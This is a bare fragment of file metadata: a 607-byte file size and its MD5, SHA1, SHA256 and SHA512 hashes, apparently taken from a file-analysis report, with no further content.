SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD52ff9161b25880eac102b4e347520b31f
SHA1d28d12b4dcc880bbded0745aec1313dfb18eca3e
SHA2561b7d71b1afcf0216c95ead9c656c57284aa5b7c9ab72bad400a754cdd2304dc0
SHA512d9080525822a01ab5628e74f5ea68f526f44be4d7af4afc85420cb9e0182eb0e369457d78e2ff4340f0cfe4dd8e1b51696ff1fe0ce91fc01d7d1c08174b2a4c6